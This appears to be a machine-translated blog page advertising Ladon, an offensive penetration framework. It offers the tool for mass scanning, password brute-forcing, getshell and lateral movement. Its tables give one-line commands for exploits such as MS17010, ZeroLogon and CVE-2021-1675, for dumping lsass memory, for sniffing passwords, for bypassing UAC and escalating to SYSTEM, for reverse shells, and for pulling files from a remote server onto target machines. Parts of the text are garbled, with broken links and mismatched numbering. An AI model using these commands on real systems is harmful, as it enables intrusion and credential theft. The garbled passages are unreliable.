logo

K8哥哥

没有绝对安全的系统

〖Tool〗Ladon modular hacking framework

本文于 797 天之前发表

Ladon is a multi-threaded plug-in comprehensive scanning artifact for large-scale intranet penetration, including port scanning, service identification, network assets, password blasting, high-risk vulnerability detection and one click getshell. It supports batch segment A / segment B / segment C and cross network segment scanning, as well as URL, host and domain name list scanning. Version 11.6 has 252 built-in functional modules

Author Ladon Bin GitHub issues Github Stars GitHub forksGitHub license

Ladon for Windows

Ladon GUI

Ladon for Cobalt Strike

Ladon for PowerShell

Python Ladon

Ladon for Linux

Instructions:

ID Subject URL
0 Ladon Document Home Page https://k8gege.org/Ladon/
1 Ladon basic document http://k8gege.org/p/648af4b3.html
2 Ladon usage example http://k8gege.org/Ladon/example-en.html
3 Basic Usage Details https://github.com/k8gege/Ladon/wiki/Ladon-Usage
4 Cobalt Strike https://github.com/k8gege/Aggressor
5 Use of Exp generator https://github.com/k8gege/Ladon/wiki/LadonExp-Usage
6 highly customized plug-in https://github.com/k8gege/Ladon/wiki/Ladon-Diy-Moudle
7 external module reference https://github.com/k8gege/K8CScan/wiki
8 PowerLadon https://github.com/k8gege/powerladon
9 PythonLadon https://github.com/k8gege/PyLadon
10 LinuxLadon https://github.com/k8gege/KaliLadon
11 ladongo full platform https://github.com/k8gege/LadonGo
12 Vulnerability demonstration video https://github.com/k8gege/K8CScan/tree/master/Video
13 Ladon6.0 function http://k8gege.org/p/56393.html
14 Ladon6.2 function http://k8gege.org/p/39070.html
13 Ladon6.4 function http://k8gege.org/p/55476.html
16 Ladon6.5 function http://k8gege.org/Ladon/WinShell.html
17 Ladon9.1 Function http://k8gege.org/Ladon/ladon91.html

Source code compilation

git clone https://github.com/k8gege/Ladon.git

Compile with VS2012 or above Net version 3.5 and 4.0 EXE

Finished product download

https://github.com/k8gege/Ladon/releases

Win7 / 2008 or installation Net 2. x 3. x system can use Ladon.exe

Win8-win10 or install Net 4. x system can use Ladon40.exe

Preface

Whether intranet or internet penetration information collection is very critical, the more information collected, the more accurate the penetration success rate will be.

However, the success rate is also affected by vulnerabilities, which are affected by timeliness. For large intranets, the scanning speed directly affects the success rate.

The timeliness of vulnerabilities is 1-2 days. It takes 1 week to scan the intranet or internet. Will many vulnerabilities be missed or allowed to succeed?

For those big stations with hundreds of thousands of domain names, the faster you find the higher the success rate, and the slower the administrator will patch it.

Therefore, we need a scanner that supports batch C / B and even a segments, and add custom modules to quickly detect new vulnerabilities.

About Ladon

Ladon: bin Laden or radon. Due to the integration of many modules, each module can become a tool independently, which is similar to that of a hundred headed dragon.

Ladon is a mythical animal in Greek mythology, a hundred headed dragon guarding the golden apple. It never sleeps. Heracles lures the dragon to sleep with the hand of the giant carrying the sky

Kill the dragon and steal the golden apple. Before the dragon died, he sealed his soul in the golden apple. The thief gave the golden apple to Snow White

In order to repay the kindness, the Golden Apple was given to seven dwarfs. After eating it, they became dragon balls and scattered around the world. The dragon balls are divided into seven, which contain

The power that can make miracles happen. When you gather 7 dragon beads and pronounce the incantation, you can summon the divine dragon, and the divine dragon will realize a wish put forward by the summoner.

Program introduction

Ladon is a multi-threaded plug-in comprehensive scanning artifact for large-scale network penetration, including port scanning, service identification, network assets, password blasting, high-risk vulnerability detection and one click getshell. It supports batch a segment / b segment / C segment and cross network segment scanning, as well as URL, host and domain name list scanning. The 11.6 version has 252 built-in functional modules and 18 external modules. Through various protocols and methods, it can quickly obtain the target network survival host IP, computer name, workgroup, shared resources, network card address, operating system version, website, subdomain name, middleware, open services, routers, databases and other information. Vulnerability detection includes MS17010, SMBHost, Weblogic, ActiveMQ, Tomcat, Struts2 series, etc, 13 types of password explosion include databases (MySQL, Oracle, MSSQL), FTP, SSH, VNC, Windows (LDAP, SMB/IPC, NBT, WMI, SmbHash, WmiHash, Winrm), BasicAuth, Tomcat, Weblogic, Rar, etc. Remote execution commands include (smbexec/wmiexe/psexec/atexec/ssheexec/jspshell). The Web fingerprint identification module can identify 75 types (Web applications, middleware, script types, page types), and can highly customize plug-in POC support Net assembly, DLL (C # / Delphi / VC), PowerShell and other language plugins, support the batch call of any external program or command by configuring ini, and the exp generator can generate vulnerability POC at one click to quickly expand the scanning ability. Ladon supports the plug-in scanning of cobalt strike to quickly expand the intranet for horizontal movement.

Easy to use

Although Ladon has various functions, it is very simple to use, and anyone can easily use it

90% of the functions can be used with only one or two parameters, and one module is equivalent to a new tool

Operating environment

Windows

Ladon.exe can be installed on the Net 2.0 and above in the Win system (. net comes with the Win7 system)

Such as Cmd, PowerShell, remote control Cmd, WebShell, etc., and Cobalt Strike memory loading

Ladon. Ps1 is perfectly compatible with win7-win10 PowerShell, and can be loaded remotely without looking at the version to achieve file penetration

Full platform ladongo supports Linux, MAC, arm and MIPS

Full platform: Linux, MacOS, windows and other OS

https://github.com/k8gege/LadonGo

Exotic conditions

The actual battle is not so smooth. Some intranet users are too laggy or unable to forward after forwarding, so they can only upload the tool to the target

Some programs that can upload two or three m take half a day or even can’t be transmitted at all, let alone several tens of m in PY

Ladon uses C # for research and development, and the program size is very small, about 500K. Even if the horse can’t, it can upload 500K programs

If you can’t, you can also load from PowerShell remote memory, which is incomparable to large programs compiled by py or go

Purpose

One stop service, providing users with a simple, functional and highly flexible scanning tool

Features

Small scanning flow

Small program size

Rich and powerful functions

The program is simple and easy to use

The plug-in supports multiple languages

Cross platform (win / Kali / Ubuntu), etc

Support Cobalt Strike plug-in

Support PowerShell no file penetration

Exp generator can generate POC in one click

Multi version, applicable to various environments

Program parameter function

1) support specified IP scanning

2 Support specified domain name scanning

3) support scanning of specified machine name

4 support specified C-segment scanning (IP / 24)

5 support specified B-segment scanning (IP / 16)

6 support specified A-segment scanning (IP / 8)

7 Support specified URL scanning

8 Support batch IP scanning (ip. txt)

9 support batch C-segment scanning (ip24. Txt)

10 Support batch B segment scanning (ip16. txt)

11 support batch URL scanning (URL. Txt)

12 support batch domain name scanning (domain. Txt)

13 Support batch machine name scanning (host. txt)

14 support batch country segment scanning (CIDR. Txt)

15 support batch string list (str.txt)

16 support host account secret list (check. Txt)

17 support user password list (userpass. Txt)

18 Support C-segment scanning in specified range

19 Support parameter loading custom DLL (C # only)

20 Support parameter loading custom EXE (C # only)

21 support parameter loading custom ini configuration file

22 support parameter loading custom PowerShell

23 support custom programs (system commands or third-party programs, i.e. programs or scripts developed in any language)

24 plug-in (support multiple languages C # / Delphi / golang / Python / VC / PowerShell)

25 support cobalt strike (scan the target intranet under the beacon command line or scan the target extranet from the springboard)

26 support CIDR format IP scanning, such as 100.64.0.0/10192.168.1.1/20, etc

27 INI configuration supports custom program password explosion

Built in function module (117)

0x001 Asset Scan (11)

Example: Ladon OnlinePC (scan the section C of the current machine, the same for other modules)

Example: Ladon 192.168.1.8/24 OnlinePC

ID module name function description return result
1 [ICMP]( http://k8gege.org/p/55476.html Live host scanning Live IP (fast detection speed 3-6 seconds/C segment)
2 [OnlinePC]( https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86 -%E5% AD% 98% E6% B4% BB% E4% B8% BB% E6% 9C% BA% E6% 89% AB% E6% 8F% 8F) Survival host scanning Survival IP, Mac address, machine name, and device manufacturer
3 [OnlineIP]( https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86 -%E5% ad% 98% E6% B4% BB% E4% B8% BB% E6% 9C% Ba% E6% 89% AB% E6% 8F% 8F) only surviving host IP surviving IP
4 [UrlScan]( https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86 -C% E6% AE% B5% E5% 9F% 9F% E5% 90% 8durl% E6% 89% AB% E6% 8F% 8F) URL domain name scan server URL (do not verify IP, domain name and web title)
5 [SameWeb]( https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86 -C% E6% AE% B5% E6% 97% 81% E7% AB% 99% E5% 9F% 9F% E5% 90% 8D% E6% 89% AB% E6% 8F% 8F) same server domain name scanning same server URL (verify IP, domain name, web title)
6 [WebScan]( https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86 -Web% E8% B5% 84% E4% BA% A7% E6% 89% AB% E6% 8F% 8F) Web information scanning Survival IP, host name, banner, and Web title
7 [WebDir]( https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86 -Web% E7% 9B% AE% E5% BD% 95% E6% 89% AB% E6% 8F% 8F) Background directory scanning Address, HTTP status
8 [SubDomain]( https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86 -%E5% ad% 90% E5% 9F% 9F% E5% 90% 8D% E7% 88% 86% E7% A0% B4) subdomain name blasting subdomain name (can be resolved by domainip / hostip)
9 [DomainIP]( https://github.com/k8gege/Ladon/wiki/%E5%AE%9E%E7%94%A8%E5%8A%9F%E8%83%BD -%E6% 89% B9% E9% 87% 8F% E5% 9F% 9F% E5% 90% 8D% E8% A7% A3% E6% 9E% 90) domain name resolution IP domain name, IP
10 [HostIP]( https://github.com/k8gege/Ladon/wiki/%E5%AE%9E%E7%94%A8%E5%8A%9F%E8%83%BD -%E6% 89% B9% E9% 87% 8F% E4% B8% BB% E6% 9C% Ba% E5% 90% 8D% E8% A7% A3% E6% 9E% 90) host name to IP IP, domain name
11 [AdiDnsDump]( http://k8gege.org/p/39070.html Acquisition of machine information in the domain (please use LdapScan to probe in non domain) IP, domain name

0x002 fingerprint identification / service identification (17)

Example: Ladon osscan

Example: Ladon 192.168.1.8/24 OsScan

ID module name function description return result
1 [OsScan]( https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86 -%E6% 93% 8D% E4% BD% 9C% E7% B3% BB% E7% BB% 9F% E6% 8E% A2% E6% B5% 8B) OS version detection Survival IP, workgroup machine name, operating system, open service
2 [PortScan]( https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86 -%E7% AB% AF% E5% 8F% A3% E6% 89% AB% E6% 8F% 8F (% E6% 9C% 8D% E5% 8A% A1% E8% AF% 86% E5% 88% AB) Port scanning includes Banner Host name, open port, service identification, Banner, Web
3 [WhatCMS]( https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86 -Web% E6% 8C% 87% E7% BA% B9% E8% AF% 86% E5% 88% AB) 86 kinds of Web fingerprint identification URL, CMS, mail system, login page, middleware (such as Apache Tomecat IIS), etc
4 [CiscoScan]( https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86 -%E6% 80% 9D% E7% A7% 91% E8% AE% be% E5% A4% 87% E6% 89% AB% E6% 8F% 8F) Cisco device scan surviving IP, device model, host name, boot, hardware version
5 [EnumMssql]( https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86 -%E6% 9E% 9A% E4% B8% be% E5% 86% 85% E7% BD% 91mssql% E4% B8% BB% E6% 9C% BA) enumerate MSSQL database hosts database IP, machine name, SQL version
6 [EnumShare]( https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86 -%E6% 9E% 9A% E4% B8% be% E7% BD% 91% E7% BB% 9C% E5% 85% B1% E4% Ba% AB% E8% B5% 84% E6% Ba% 90) enumerate network shared resources domain, surviving IP, shared path
7 [LdapScan]( http://k8gege.org/p/39070.html when no password is specified, only the LDAP server IP is detected as an LDAP server
8 [FtpScan]( http://k8gege.org/p/39070.html when no password is specified, only detect whether the FTP server IP is an FTP server
9 [EthScan]( http://k8gege.org/Ladon/ethscan.html OXID multi network card host detection
10 [DnsScan]( http://k8gege.org/Ladon/ladon91.html OXID multi network card host detection
11 [SmbInfo]( http://k8gege.org/Ladon/ntlminfo.html SMB information detection surviving IP, machine name, win version, domain name, DNS
12 [NbtInfo]( http://k8gege.org/Ladon/ntlminfo.html NBT information detection surviving IP, machine name, win version, domain name, DNS
13 [WmiInfo]( http://k8gege.org/Ladon/ntlminfo.html WMI information detection surviving IP, machine name, win version, domain name, DNS
14 [RdpInfo]( http://k8gege.org/Ladon/ntlminfo.html RDP information detection surviving IP, machine name, win version, domain name, DNS
15 [WinrmInfo]( http://k8gege.org/Ladon/ntlminfo.html Winrm information detection Survival IP, machine name, Win version, domain name, DNS
16 [MssqlInfo]( http://k8gege.org/Ladon/ntlminfo.html MSSQL information detection surviving IP, machine name, win version, domain name, DNS
17 [ExchangeInfo]( http://k8gege.org/Ladon/ntlminfo.html Exchange information detection Survival IP, machine name, Win version, domain name, DNS
18 [ WhatCms]( http://k8gege.org/p/FindExchange.html exchange server probe live IP, exchange, banner

0x003 Password detection/password explosion (18)

[User defined port (IP: port), account secret detection (user password), host account secret detection (IP port database user password)]

Example: Ladon SshScan

Example: Ladon 192.168.1.8/24 SshScan

Example: Ladon 192.168.1.8:22 SshScan (specify the port)

Example: Ladon test rar RarScan

ID Module Name Function Description Return Result Dependency
1 [SmbScan]( http://k8gege.org/Ladon/SmbScan.html SMB password explosion (Windows) Detection process, successful password, LOG file
2 [WmiScan]( http://k8gege.org/Ladon/WmiScan.html Wmi password explosion (Windows) Detection process, successful password, LOG file
3 [NbtScan]( http://k8gege.org/Ladon/NbtScan.html Ipc password explosion (Windows) Detection process, successful password, LOG file
4 [LdapScan]( http://k8gege.org/p/56393.html AD domain password explosion (Windows) Detection process, successful password, LOG file
5 [SmbHashScan]( http://k8gege.org/Ladon/SmbHashScan.html SMB hash password blasting (Windows) detection process, successful password, log file
6 [WmiHashScan]( http://k8gege.org/Ladon/WmiHashScan.html WMI hash password blasting (Windows) detection process, successful password, log file
7 [SshScan]( http://k8gege.org/Ladon/sshscan.html SSH password explosion (Linux) Detection process, successful password, LOG file
8 [MssqlScan]( http://k8gege.org/Ladon/MssqlScan.html MSSQL database password blasting detection process, successful password, log file
9 [OracleScan]( http://k8gege.org/Ladon/OracleScan.html Oracle database password explosion detection process, successful password, log file
10 [MysqlScan]( http://k8gege.org/Ladon/MysqlScan.html MySQL database password explosion Detection process, successful password, LOG file
11 [WeblogicScan]( http://k8gege.org/Ladon/weblogicScan.html Weblogic background password blasting detection process, successful password, log file
12 [VncScan]( http://k8gege.org/Ladon/VncScan.html VNC remote desktop password blasting detection process, successful password, log file
13 [FtpScan]( http://k8gege.org/Ladon/ftpscan.html Ftp server password explosion Detection process, successful password, LOG file
14 [RarScan]( https://github.com/k8gege/Ladon/wiki/%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4 -Rar% E6% 96% 87% E4% BB% B6% E5% AF% 86% E7% A0% 81% E7% A0% B4% E8% A7% A3) rar compressed package password explosion detection process, success password, log file rar.exe
15 [TomcatScan]( http://k8gege.org/Ladon/TomcatScan.html Tomcat background login password blasting detection process, successful password, log file
16 [HttpBasicScan]( http://k8gege.org/Ladon/HttpbasicScan.html httpbasic401 authentication password blasting detection process, successful password, log file
17 [WinrmScan]( http://k8gege.org/Ladon/WinrmScan.html winrm authentication password blasting detection process, successful password, log file
18 [NbtScan]( http://k8gege.org/Ladon/NbtScan.html Netbios password explosion Detection process, successful password, LOG file
19 [DvrScan]( http://k8gege.org/Ladon/dvrscan.html camera password blasting detection process, successful password, log file

0x004 vulnerability detection / exploitation (12)

Example: Ladon MS17010

Example: Ladon 192.168.1.8/24 MS17010

Example: Ladon http://192.168.1.8 WeblogicExp

ID Module name Function description
1 [MS17010]( https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F -Ms17010% E6% BC% 8F% E6% B4% 9E% E6% A3% 80% E6% B5% 8b) SMB vulnerability detection (cve-2017-0143 / cve-2017-0144 / cve-2017-0145 / cve-2017-0146 / cve-2017-0148)
2 [SMBGhost]( http://k8gege.org/Ladon/example.html SMBHost remote overflow vulnerability detection (CVE-2020-0796)
3 [WeblogicPoc]( https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F -CVE-2019-2725 Weblogic GetShell Exploit) Weblogic vulnerability detection (CVE-2019-2725/[CVE-2018-2894]( https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F -CVE-2018-2894))
4 [PhpStudyPoc]( https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F -PhpStudy% E5% 90% 8E% E9% 97% A8% E6% A3% 80% E6% B5% 8B) PhpStudy Rear Door Detection (phpstudy 2016/phpstudy 2018)
5 [ActivemqPoc]( https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F –Cve-2016-3088) ActiveMQ vulnerability detection (cve-2016-3088)
6 [TomcatPoc]( https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F -CVE-2017-12615) Tomcat vulnerability detection (CVE-2017-12615)
7 [WeblogicExp]( https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F -Cve-2019-2725-weblogic-getshell-exploit) Weblogic vulnerability exploitation (cve-2019-2725)
8 [TomcatExp]( https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8 -Cve-2017-12615) Tomcat vulnerability exploitation (cve-2017-12615)
9 [Struts2Poc]( https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F -Struts 2% E7% B3% BB% E5% 88% 97% E6% BC% 8F% E6% B4% 9E% E6% A3% 80% E6% B5% 8B) Struts 2 vulnerability detection (S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode)
10 [ZeroLogon]( http://k8gege.org/Ladon/cve-2020-1472.html cve-2020-1472 domain control vulnerability exp
11 [CVE-2020-0688]( http://k8gege.org/Ladon/cve-2020-0688.html CVE-2020-0688 Exchange Serialization Vulnerability Exploitation
12 [CVE-2020-0796]( http://k8gege.org/p/smbghost_cve_2020_0796.html SMBHost Win10 remote vulnerability

0x005 Encryption and decryption (4)

Example: Ladon string enhex

Example: Ladon EnHex (batch str.txt)

ID Module name Function description
1 [EnHex]( https://github.com/k8gege/Ladon/wiki/%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86 -%E6% 89% B9% E9% 87% 8FHex% E5% AF% 86% E7% A0% 81) Batch Hex password encryption
2 [DeHex]( https://github.com/k8gege/Ladon/wiki/%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86 -%E6% 89% B9% E9% 87% 8fhex% E5% AF% 86% E7% A0% 81) bulk hex password decryption
3 [EnBase64]( https://github.com/k8gege/Ladon/wiki/%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86 -%E6% 89% B9% E9% 87% 8FBase64% E5% AF% 86% E7% A0% 81) Batch Base64 password encryption
4 [DeBase64]( https://github.com/k8gege/Ladon/wiki/%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86 -%E6% 89% B9% E9% 87% 8FBase64% E5% AF% 86% E7% A0% 81) Batch Base64 password decryption

####0x006 Download function (2)

The download function is mainly used for intranet file transfer or downloading VPS files to the target machine

ID Module name Function description Usage
1 HttpDownLoad HTTP Download Ladon HttpDownLoad http://k8gege.org/test.exe
2 ftpdownload FTP download Ladon ftpdownload 127.0.0.1:21 admin admin test.exe

0x007 network sniffing (3)

Based on Socket RAW sniffing, Winpcap does not need to be installed, but administrator permissions are required

It is mainly used to discover the surviving machines in the intranet or sniff the password of the administrator to log in to FTP or web sites

Other functions may be added later, and a special sniffing tool may be written

PS: At present, most sniffing tools on the Internet are based on Winpcap packet capture. Some machines have restrictions on it, and will prompt that the network card cannot be found and cannot be sniffed.

The point is that many programs are either GUI or can only be used under Linux. If you use py’s scapy (WinPcap) to realize discovery, the program can reach 48m

Of course, it can also be used to find the online address of a malicious trojan (for example, the netstat sent by Cobal strike in one minute by default may not be visible)

ID Module name Function description Usage
1 [FtpSniffer/SnifferFtp]( http://k8gege.org/p/56393.html FTP password sniffer Ladon FTP sniffer 192.168.1.5
2 [HttpSniffer/SnifferHTTP]( http://k8gege.org/p/qqkey.html HTTP password sniffing Ladon httpsniffer 192.168.1.5
3 [Sniffer]( http://k8gege.org/p/56393.html Network sniffer (source address, target address) Ladon Sniffer

0x008 password reading (3)

ID Module name Function description Usage
1 [EnumIIS/IisPwd]( http://k8gege.org/p/56393.html IIS site password reading Ladon EnumIIS or Ladon IisPwd
2 [DumpLsass ]( http://k8gege.org/p/55476.html dumplsass memory password Ladon dumplsass
3 [web]( http://k8gege.org/Ladon/GetWinAuth.html Capture Win Password

0x009 Information Collection (12)

ID Module name Function description Usage
1 [EnumProcess/ProcessList/tasklist]( http://k8gege.org/p/56393.html Process Details Ladon EnumProcess or Ladon Tasklist
2 [GetCmdLine/CmdLine]( http://k8gege.org/p/56393.html get command line parameters Ladon CmdLine or Ladon CmdLine cmd.exe
3 [GetInfo/GetInfo2]( http://k8gege.org/p/56393.html Get basic penetration information Ladon GetInfo or Ladon GetInfo2
4 GetPipe View native named pipes Ladon GetPipe
5 rdlog view 3389 connection records Ladon rdlog
6 queryadmin view administrator group user Ladon queryadmin
7 [NetVer]( http://k8gege.org/ view the installation Net version Ladon netver or Ladon netversion
8 [PsVer]( http://k8gege.org/ View PowerShell version Ladon PsVersion or Ladon PSVersion
9 whoami View the current user and privileges Ladon whoami
10 recent View the files recently accessed by the user Ladon recent
11 allver get the list of installed programs Ladon allver
12 [Usblog]( http://k8gege.org/p/56393.html view USB usage record Ladon usblog

0x010 Remote execution (8)

ID Module name Function description Usage
1 [WmiExec]( http://k8gege.org/Ladon/WinShell.html 135 port execute command http://k8gege.org/Ladon/WinShell.html
2 [PsExec]( http://k8gege.org/Ladon/WinShell.html 445 port execution command http://k8gege.org/Ladon/WinShell.html
3 [AtExec]( http://k8gege.org/Ladon/WinShell.html 445 port execution command http://k8gege.org/Ladon/WinShell.html
4 [SshExec]( http://k8gege.org/Ladon/WinShell.html 22 port execute command http://k8gege.org/Ladon/WinShell.html
5 [JspShell]( http://k8gege.org/p/ladon_cs_shell.html Jsp executes the command in one sentence http://k8gege.org/p/ladon_cs_shell.html
6 [WebShell]( http://k8gege.org/Ladon/webshell.html webshell execute command http://k8gege.org/Ladon/webshell.html
7 WebShell CVE-2020-17144 http://k8gege.org/p/CVE-2020-17144.html
8 [WinrmExec]( http://k8gege.org/Ladon/WinrmExec.html 5895 port execution command http://k8gege.org/Ladon/WinrmExec.html
9 [SmbExec]( http://k8gege.org/Ladon/SmbExec.html Port 445 HASH execution command http://k8gege.org/Ladon/SmbExec.html

0x011 Right raising and right lowering (9)

ID Module name Function description Usage
1 [BypassUac]( http://k8gege.org/p/39070.html Bypass UAC execution, support Win7-Win10 Ladon Bypass Uac c: 1.exe or Ladon Bypass Uac c: 1.bat
2 [GetSystem]( http://k8gege.org/p/55476.html run the program Ladon getsystem CMD Exe or Ladon getsystem CMD exe explorer
3 [Runas]( http://k8gege.org/Ladon/runas.html Simulate the user to execute the command Ladon Runas user pass cmd
4 [ms16135]( http://k8gege.org/p/55476.html Right to SYSTEM Ladon ms16135 whoami
5 [BadPotato]( http://k8gege.org/Ladon/potato.html IIS or the service user is authorized to SYSTEM Ladon BadPotato cmdline
6 [SweetPotato]( http://k8gege.org/Ladon/potato.html IIS or the service user is authorized to SYSTEM Ladon SweetPotato cmdline
7 [SweetPotato]( http://k8gege.org/Ladon/win2016_lpe_potato_bypass.html Win10/2016 to System Ladon SweetPotato cmdline
8 [RDPHijack]( http://k8gege.org/Ladon/RdpHijack.html remote desktop session hijacking Ladon rdphijack sessionid
9 [CVE-2021-1675]( http://k8gege.org/p/CVE-2021-1675.html Printer vulnerability authorization Ladon CVE-2021-1675 c: evil.dll

0x012 Rebound shell (4)

ID Module name Function description Protocol
1 [netcat]( http://k8gege.org/Ladon/ReverseShell.html Bounce Shell Series Tutorial TCP
2 [MSF_Shell]( http://k8gege.org/Ladon/ReverseShell.html rebound shell series tutorial TCP / HTTP / HTTPS
3 [PowerCat]( http://k8gege.org/Ladon/ReverseShell.html rebound shell series tutorial TCP / UDP / ICMP
4 [MSF_Meter]( http://k8gege.org/Ladon/ReverseShell.html Bounce Shell Series Tutorial TCP/HTTP/HTTPS
5 [runas]( http://k8gege.org/Ladon/runas.html Runas rebounds shell TCP

Port forwarding

1 | [PortTran]( http://k8gege.org/Ladon/porttran.html )| Intranet port forwarding
2 | [netsh]( http://k8gege.org/Ladon/netsh.html )| System command port forwarding

0x014 other functions (12)

ID Module name Function description Usage
1 [EnableDotNet]( http://k8gege.org/p/39070.html One click enable Net 3.5 (not enabled by default in 2008) Ladon enabledotnet
2 [gethtml]( http://k8gege.org/p/39070.html get the HTML source code of intranet site Ladon gethtml http://192.168.1.1
3 [CheckDoor]( http://k8gege.org/p/55476.html detection back door (disclosed online for many years) Ladon checkdoor or Ladon autorun
4 [GetIP]( http://k8gege.org/ get local intranet IP and external IP Ladon getip
5 [Open3389]( http://k8gege.org/ one click Open 3389 Ladon open3389
6 [ActiveAdmin]( http://k8gege.org/ Activate the built-in user Administrator Ladon ActiveAdmin
7 [ActiveGuest]( http://k8gege.org/ activate built-in user guest Ladon activeguest
8 [RunPS]( http://k8gege.org/ no PowerShell Exe Execute PowerShell script Ladon RunPS *. ps1
9 regauto add registry run startup key
10 SC service plus startup item (system permission)
11 SC service executor (system authority)
12 at plan execution program (no time required) (system permission)

Note: The above is only the primary usage of the built-in modules of the tool. Please refer to the usage documentation for external plug-ins or more advanced usage

Intermediate usage: INI file configuration, calling arbitrary programs, system commands, and batch utilization of ready-made exp in various languages

Advanced usage: exp generator generates POC with one click, and uses plug-ins written in various languages to extend Ladon’s scanning ability.

External plug-in module (21)

ID Function Implementation language Function description
1 vulnerability scanning C language [CVE 2019-0708 windows RDP 3389 vulnerability batch detection]( https://github.com/k8gege/K8CScan/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F -CVE-2019-0708-Windows-Rdp%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C)
2 Vulnerability exploitation Exp generator [ThinkPap5.0.22 5.1.29 RCE GetShell Exploit]( https://github.com/k8gege/K8CScan/wiki/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8 -ThinkPHP-5.0.22-5.1.29-RCE-GetShell-Exploit)
3 Vulnerability exploitation Python [CVE-2019-9621 Zimbra GetShell Exploit]( https://github.com/k8gege/ZimbraExploit )
4 Vulnerability Exploitation Python [CVE-2019-0604 SharePoint GetShell Exploit]( https://github.com/k8gege/CVE-2019-0604 )
5 Vulnerability exploitation Exp generator [CVE 2016-3088 ActiveMQ GetShell Exploit]( https://github.com/k8gege/K8CScan/wiki/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8 -CVE-2016-3088-ActiveMQ-GetShell-Exploit)
6 Vulnerability Exploitation Python [Apache Solr 8.2.0 Velocity RCE 0day Exploit]( https://github.com/k8gege/SolrExp )
7 Vulnerability Exploitation Exp Generator [PhpStudy Backdoor GetShell Exploit]( https://github.com/k8gege/K8CScan/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F -PhpStudy%E5%90%8E%E9%97%A8)
8 Command execution INI configuration [INI calls external program commands to batch Linux upper control]( https://github.com/k8gege/K8CScan/wiki/%E8%B0%83%E7%94%A8%E5%91%BD%E4%BB%A4 -%E6%89%B9%E9%87%8FSSH%E4%B8%8A%E6%8E%A7)
9 command execution ini configuration [ini calls external program commands batch windowns upper control]( https://github.com/k8gege/K8CScan/wiki/%E8%B0%83%E7%94%A8%E5%91%BD%E4%BB%A4 -%E6%89%B9%E9%87%8FWin%E4%B8%8A%E6%8E%A7)
10 vulnerability scanning Python [php-fpm Remote Code Execution Vulnerability (cve-2019-11043)]( https://github.com/k8gege/CVE-2019-11043 )
11 Vulnerability scanning Exp generator [Weblogic CVE-2018-2894 vulnerability detection]( https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F -CVE-2018-2894)
12 Vulnerability Exploitation PowerShell [MS17010EXP Eternal Blue Vulnerability Exploitation]( https://github.com/k8gege/MS17010EXP )
13 script call PowerShell [Kali 2019 no PowerShell execution script]( http://k8gege.org/p/32e1a912.html )
14 password scanning ini configuration [IPC password blasting of ipcscan.ini ini plug-in]( http://k8gege.org/p/55476.html )
15 Password scanning INI configuration [Smb password explosion of smbscan.ini INI plug-in]( http://k8gege.org/p/55476.html )
16 password scanning ini configuration [ntlmhash blasting of smbhash.ini ini ini plug-in]( http://k8gege.org/p/55476.html )
17 password scanning ini configuration [winrm password blasting of winrmscan.ini ini plug-in]( http://k8gege.org/Ladon/WinrmScan.html )
18 Information Collection . NET [Detect whether the website uses Shiro]( http://k8gege.org/Ladon/IsShiro.html )
19 Vulnerability scanning Python [Domain control right CVE-2020-1472-EXP]( https://github.com/k8gege/CVE-2020-1472-EXP )
20 exploit exp generator [drupal cve-2018-7600]( http://k8gege.org/p/CVE-2018-7600.html )
21 [CVE-2020-0796]( http://k8gege.org/p/smbghost_cve_2020_0796.html SMBHost Win10 remote vulnerability
22 Vulnerability Exploitation Exp Generator [IIS Write Permission Vulnerability Exploitation]( http://k8gege.org/Ladon/iisput.html )

Document reference Cscan: https://github.com/k8gege/K8CScan/wiki

Intermediate usage

Batch scanning

0x001 Parameter ip/24 ip/16 ip/8

